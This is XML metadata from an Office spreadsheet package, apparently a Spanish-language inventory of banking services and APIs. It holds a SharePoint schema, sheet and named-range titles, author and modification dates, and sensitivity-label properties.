  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="f7838893-e897-44d5-996a-3c24d6afd26a" xmlns:ns3="71787827-2e8a-4f47-83ce-ead88cca5059" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="903682182e4510bfdb06e85e194e774b" ns1:_="" ns2:_="" ns3:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="f7838893-e897-44d5-996a-3c24d6afd26a"/>
    <xsd:import namespace="71787827-2e8a-4f47-83ce-ead88cca5059"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:SeoKeywords"/>
                <xsd:element ref="ns3:MediaServiceMetadata" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceFastMetadata" minOccurs="0"/>
                <xsd:element ref="ns1:_ip_UnifiedCompliancePolicyProperties" minOccurs="0"/>
                <xsd:element ref="ns1:_ip_UnifiedCompliancePolicyUIAction" minOccurs="0"/>
                <xsd:element ref="ns2:SharedWithUsers" minOccurs="0"/>
                <xsd:element ref="ns2:SharedWithDetail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Propiedades de la Directiva de cumplimiento unificado" ma:hidden="true" ma:internalName="_ip_UnifiedCompliancePolicyProperties">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="_ip_UnifiedCompliancePolicyUIAction" ma:index="13"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7838893-e897-44d5-996a-3c24d6afd26a" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SeoKeywords" ma:index="8" ma:displayName="Palabras claves" ma:internalName="SeoKeywords">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="SharedWithUsers" ma:index="14"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talles de uso compartido"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1787827-2e8a-4f47-83ce-ead88cca5059"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ma:index="9" ma:displayName="Comentarios"/>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C57ABC7-D656-4494-BE2B-E89FAF815AB9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3"/>
    <ds:schemaRef ds:uri="f7838893-e897-44d5-996a-3c24d6afd26a"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8F9B262B-F3F3-4474-83CC-413D4EB3A199}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/DataMashup"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FDB38008-B247-40DE-BB9A-015DDA5E77A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7838893-e897-44d5-996a-3c24d6afd26a"/>
    <ds:schemaRef ds:uri="71787827-2e8a-4f47-83ce-ead88cca50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CFC33CA5-D333-48E8-8250-D12B8C0237B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19</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Rangos con nombre</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>35</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="54" baseType="lpstr">
      <vt:lpstr>Graficos</vt:lpstr>
      <vt:lpstr>Inventario de Servicios</vt:lpstr>
      <vt:lpstr>Hoja8</vt:lpstr>
      <vt:lpstr>Hoja7</vt:lpstr>
      <vt:lpstr>Hoja6</vt:lpstr>
      <vt:lpstr>Hoja4</vt:lpstr>
      <vt:lpstr>Servicios Gobierno</vt:lpstr>
      <vt:lpstr>Servicios MDP</vt:lpstr>
      <vt:lpstr>API IBM Cloud </vt:lpstr>
      <vt:lpstr>API ONPREMISE</vt:lpstr>
      <vt:lpstr>RUNTIME</vt:lpstr>
      <vt:lpstr>Servicios no Encontrados</vt:lpstr>
      <vt:lpstr>Proveedores Faltantes</vt:lpstr>
      <vt:lpstr>Servicios MDP RIN</vt:lpstr>
      <vt:lpstr>Lista</vt:lpstr>
      <vt:lpstr>Hoja5</vt:lpstr>
      <vt:lpstr>Hoja3</vt:lpstr>
      <vt:lpstr>Hoja2</vt:lpstr>
      <vt:lpstr>Hoja1</vt:lpstr>
      <vt:lpstr>APOYO_ADMINISTRATIVO_Y_FINANCIERO</vt:lpstr>
      <vt:lpstr>APOYO_AL_NEGOCIO</vt:lpstr>
      <vt:lpstr>CANALES_DIGITALES</vt:lpstr>
      <vt:lpstr>CANALES_TRADICIONALES</vt:lpstr>
      <vt:lpstr>CANALES_Y_CONTENIDOS_DIGITALES_PYMES</vt:lpstr>
      <vt:lpstr>CLIENTES</vt:lpstr>
      <vt:lpstr>DESARROLLO_DE_SERVICIOS_E_INTEGRACION</vt:lpstr>
      <vt:lpstr>Ecosistemas</vt:lpstr>
      <vt:lpstr>ECOSISTEMAS_DE_RIESGOS_SEGURIDAD</vt:lpstr>
      <vt:lpstr>ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI</vt:lpstr>
      <vt:lpstr>FILIALES_DEL_EXTERIOR_Y_ALIADOS</vt:lpstr>
      <vt:lpstr>INFORMACION</vt:lpstr>
      <vt:lpstr>LEASING</vt:lpstr>
      <vt:lpstr>MEDIOS_DE_PAGO</vt:lpstr>
      <vt:lpstr>NEGOCIOS_DE_INVERSION</vt:lpstr>
      <vt:lpstr>PRODUCTOS_DE_CAPTACION</vt:lpstr>
      <vt:lpstr>PRODUCTOS_DE_FINANCIACION</vt:lpstr>
      <vt:lpstr>SUFI</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_APOYO_ADMINISTRATIVO_Y_FINANCIERO</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_APOYO_AL_NEGOCIO</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_CANALES_DIGITALES</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_CANALES_TRADICIONALES</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_CANALES_Y_CONTENIDOS_DIGITALES_PYMES</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_CLIENTES</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_DESARROLLO_DE_SERVICIOS_E_INTEGRACION</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_ECOSISTEMAS_DE_RIESGOS__SEGURIDAD_Y_APOYO_TI</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_ECOSISTEMAS_DE_RIESGOS_SEGURIDAD</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_FILIALES_DEL_EXTERIOR_Y_ALIADOS</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_INFORMACION</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_LEASING</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_MEDIOS_DE_PAGO</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_NEGOCIOS_DE_INVERSION</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_PRODUCTOS_DE_CAPTACION</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_PRODUCTOS_DE_FINANCIACION</vt:lpstr>
      <vt:lpstr>TRANSF_Y_SOP_SUFI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Jimmy Alejandro Loaiza</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Daniel Esteban Alvarez Santamaria</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-16T19:10:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-16T00:35:10Z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1bdff26-5887-4e5c-8426-6e404c233df0_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_SetDate">
    <vt:lpwstr>2020-08-03T22:17:58Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_Name">
    <vt:lpwstr>71bdff26-5887-4e5c-8426-6e404c233df0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_SiteId">
    <vt:lpwstr>b5e244bd-c492-495b-8b10-61bfd453e423</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_ActionId">
    <vt:lpwstr>bf11376a-25f0-4fc2-a501-0000e85c3be1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_71bdff26-5887-4e5c-8426-6e404c233df0_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="ContentTypeId">
    <vt:lpwstr>0x010100CDCAC618FAA4704797E4E5FF9D9601F4</vt:lpwstr>
  </property>
</Properties>
</file>